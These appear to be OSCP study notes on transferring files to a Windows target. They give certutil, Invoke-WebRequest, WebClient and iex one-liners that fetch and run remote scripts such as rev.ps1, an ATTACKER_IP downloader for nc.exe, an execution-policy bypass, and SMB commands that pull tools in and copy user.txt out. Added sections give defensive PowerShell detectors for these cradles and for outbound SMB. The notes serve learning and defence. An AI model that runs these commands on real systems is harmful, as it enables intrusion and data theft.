OSCP Notes

Windows

Certutils

certutil.exe -urlcache -split -f http://10.0.0.5/40564.exe bad.exe

IWR (Invoke Web Request)

powershell.exe Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1

powershell.exe -command "iwr -Uri http://192.168.1.2/putty.exe -OutFile C:\Temp\putty.exe"

System.Net.WebClient

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2/putty.exe', 'putty.exe')

IEX

Instead of saving the payload to disk, it can be executed directly in memory with Invoke-Expression (alias iex).

powershell.exe iex (New-Object Net.WebClient).DownloadString('http://192.168.119.193:8000/ps-sudo.ps1')

IEX also accepts pipeline input. When launching from cmd.exe, quote the whole command so the pipe is handled by PowerShell rather than by cmd:

powershell "Invoke-WebRequest http://10.10.16.26/rev.ps1 | iex"

Internet Explorer Basic Parsing

Invoke-WebRequest parses responses with the Internet Explorer engine. On hosts where IE's first-launch configuration has never been completed, the request fails and the download does not happen.

This can be bypassed with the -UseBasicParsing parameter, which skips the IE dependency.

powershell "Invoke-WebRequest https://<ip>/PowerView.ps1 -UseBasicParsing | iex"

Escaping shell

If any of the above commands fails with the error Incorrect syntax near '/', the double quotes are being consumed by the calling shell. Escape them with a backslash (\):

powershell.exe IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.16.26:8000/rev.ps1\")

Script

  • If the above commands get blocked, we can write a small PowerShell script that downloads the file instead.

  • Run the following commands on the victim (from cmd.exe, so echo writes each line literally into wget.ps1):

echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $url = "http://ATTACKER_IP/nc.exe" >> wget.ps1
echo $file = "nc.exe" >> wget.ps1
echo $webclient.DownloadFile($url,$file) >> wget.ps1

Execution of script

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
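Every technique in the Certutil, IWR, System.Net.WebClient, IEX and Script sections above leaves a recognisable string in PowerShell Script Block Logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log). The following is an added example, not code from the original notes: a small hunting function that scores script-block text for those download-cradle indicators. The sample script blocks are constructed (four of them mirror the one-liners in this note), and the pattern names and scoring weights are this example's own choices, not a standard.

```powershell
# Added example (not part of the original notes): look for the download cradles
# from this page in PowerShell Script Block Logging text.
# On a real host, feed the function with:
#   Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104} |
#       ForEach-Object { $_.Properties[2].Value }      # Properties[2] is ScriptBlockText

$CradlePatterns = [ordered]@{
    'WebClient.DownloadString' = 'DownloadString\s*\('
    'WebClient.DownloadFile'   = 'DownloadFile\s*\('
    'Invoke-WebRequest'        = '\b(Invoke-WebRequest|iwr|wget|curl)\b'   # iwr/wget/curl are built-in aliases
    'Invoke-Expression'        = '\b(Invoke-Expression|iex)\b'
    'certutil -urlcache'       = '\bcertutil(\.exe)?\b.*-urlcache'
    'UseBasicParsing'          = '-UseBasicParsing'
    'ExecutionPolicy Bypass'   = '-ExecutionPolicy\s+Bypass'
}

function Find-DownloadCradle {
    param([Parameter(Mandatory)][string[]]$ScriptBlockText)

    foreach ($text in $ScriptBlockText) {
        # -match is case-insensitive by default, which suits PowerShell's case-insensitive names.
        $hits = @(foreach ($name in $CradlePatterns.Keys) {
            if ($text -match $CradlePatterns[$name]) { $name }
        })
        $score = $hits.Count
        # A URL fetched and handed straight to iex (in-memory execution) is the
        # highest-signal combination, so weight it extra.
        if ($hits -contains 'Invoke-Expression' -and
            ($hits -contains 'WebClient.DownloadString' -or $hits -contains 'Invoke-WebRequest')) {
            $score += 2
        }
        $urls = [regex]::Matches($text, 'https?://[^\s''")]+') | ForEach-Object { $_.Value }
        if ($score -gt 0) {
            [pscustomobject]@{
                Score      = $score
                Indicators = ($hits -join ', ')
                Urls       = ($urls -join ', ')
                Text       = $text
            }
        }
    }
}

# Constructed sample script blocks; the last one is a benign control and should not be reported.
$Samples = @(
    "iex (New-Object Net.WebClient).DownloadString('http://192.168.119.193:8000/ps-sudo.ps1')",
    "Invoke-WebRequest http://10.10.16.26/rev.ps1 | iex",
    "(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2/putty.exe', 'putty.exe')",
    "certutil.exe -urlcache -split -f http://10.0.0.5/40564.exe bad.exe",
    "Get-ChildItem C:\Windows\Temp | Where-Object Length -gt 1MB"
)

Find-DownloadCradle -ScriptBlockText $Samples | Sort-Object Score -Descending | Format-Table -AutoSize
```

Script Block Logging has to be enabled (Group Policy: Turn on PowerShell Script Block Logging) for 4104 events to exist at all; the certutil line is only seen here because the sample is a script block, so in practice pair this with process-creation logging (Event ID 4688 with command-line auditing, or Sysmon Event ID 1) to catch cradles launched from cmd.exe.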

SMB

Attacker -

smbserver.py gabbar /tmp

Target -

dir \\Attacker_ip\gabbar
# lists the files in the share

copy \\10.10.14.109\gabbar\winPEASx86.exe .
# download a file from our machine to the target

copy user.txt \\10.10.14.109\gabbar
# upload a file from the target to our box
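On the wire, the SMB transfer above is a workstation opening an outbound TCP/445 session to a host that is not a file server. The following is an added example, not code from the original notes: it parses Windows Firewall log lines (the pfirewall.log format, which records allowed connections only after logging is enabled with Set-NetFirewallProfile -All -LogAllowed True) and reports outbound SMB to destinations outside an approved list of file-server ranges. The log lines and the approved ranges are constructed for the example; the CIDR helper handles IPv4 only.

```powershell
# Added example (not part of the original notes): flag outbound SMB (TCP/445)
# to addresses outside the approved file-server ranges, from Windows Firewall
# log lines (%systemroot%\system32\LogFiles\Firewall\pfirewall.log).

function ConvertTo-IPv4Integer {
    # Big-endian integer form of a dotted IPv4 address, computed without relying on host byte order.
    param([Parameter(Mandatory)][string]$Ip)
    $b = ([IPAddress]$Ip).GetAddressBytes()
    return [uint32](([uint64]$b[0] * 16777216) + ([uint64]$b[1] * 65536) + ([uint64]$b[2] * 256) + [uint64]$b[3])
}

function Test-IPv4InCidr {
    param([Parameter(Mandatory)][string]$Ip, [Parameter(Mandatory)][string]$Cidr)
    if (([IPAddress]$Ip).AddressFamily -ne 'InterNetwork') { return $false }   # IPv6 is out of scope here
    $net, $bits = $Cidr -split '/'
    # Network mask as an integer: 2^32 - 2^(32-bits); these values are exact in double precision.
    $mask = [uint32]([math]::Pow(2, 32) - [math]::Pow(2, 32 - [int]$bits))
    return ((ConvertTo-IPv4Integer $Ip) -band $mask) -eq ((ConvertTo-IPv4Integer $net) -band $mask)
}

function Find-UnexpectedSmbClient {
    param(
        [Parameter(Mandatory)][string[]]$LogLines,
        [Parameter(Mandatory)][string[]]$ApprovedServerCidrs
    )
    foreach ($line in $LogLines) {
        if ([string]::IsNullOrWhiteSpace($line) -or $line.StartsWith('#')) { continue }   # header lines
        $f = $line -split '\s+'
        # pfirewall.log fields: date time action protocol src-ip dst-ip src-port dst-port
        #                       size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
        if ($f.Count -lt 17) { continue }
        $action, $proto, $src, $dst, $dstPort, $path = $f[2], $f[3], $f[4], $f[5], $f[7], $f[16]
        # Only outbound (SEND) TCP connections to port 445 are of interest.
        if ($proto -ne 'TCP' -or $dstPort -ne '445' -or $path -ne 'SEND') { continue }
        $approved = $false
        foreach ($cidr in $ApprovedServerCidrs) {
            if (Test-IPv4InCidr -Ip $dst -Cidr $cidr) { $approved = $true; break }
        }
        if (-not $approved) {
            [pscustomobject]@{
                Time        = "$($f[0]) $($f[1])"
                Action      = $action
                Source      = $src
                Destination = $dst
            }
        }
    }
}

# Constructed sample log; only the second connection (SMB to 10.10.14.109, outside
# the approved range) should be reported.
$SampleLog = @(
    '#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path',
    '2024-03-01 09:15:02 ALLOW TCP 10.10.14.5 10.10.20.10 49710 445 0 S 0 0 0 - - - SEND',
    '2024-03-01 09:15:40 ALLOW TCP 10.10.14.5 10.10.14.109 49712 445 0 S 0 0 0 - - - SEND',
    '2024-03-01 09:16:01 ALLOW TCP 10.10.14.5 203.0.113.7 49713 443 0 S 0 0 0 - - - SEND',
    '2024-03-01 09:16:30 ALLOW TCP 10.10.14.109 10.10.14.5 51000 445 0 S 0 0 0 - - - RECEIVE'
)

Find-UnexpectedSmbClient -LogLines $SampleLog -ApprovedServerCidrs @('10.10.20.0/24') | Format-Table -AutoSize
```

The same check is cheaper to enforce than to detect: an outbound firewall rule that allows TCP/445 only to the approved server ranges blocks both directions of the copy command above, and the log line it produces (action DROP) is itself the alert.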

Last updated 3 years ago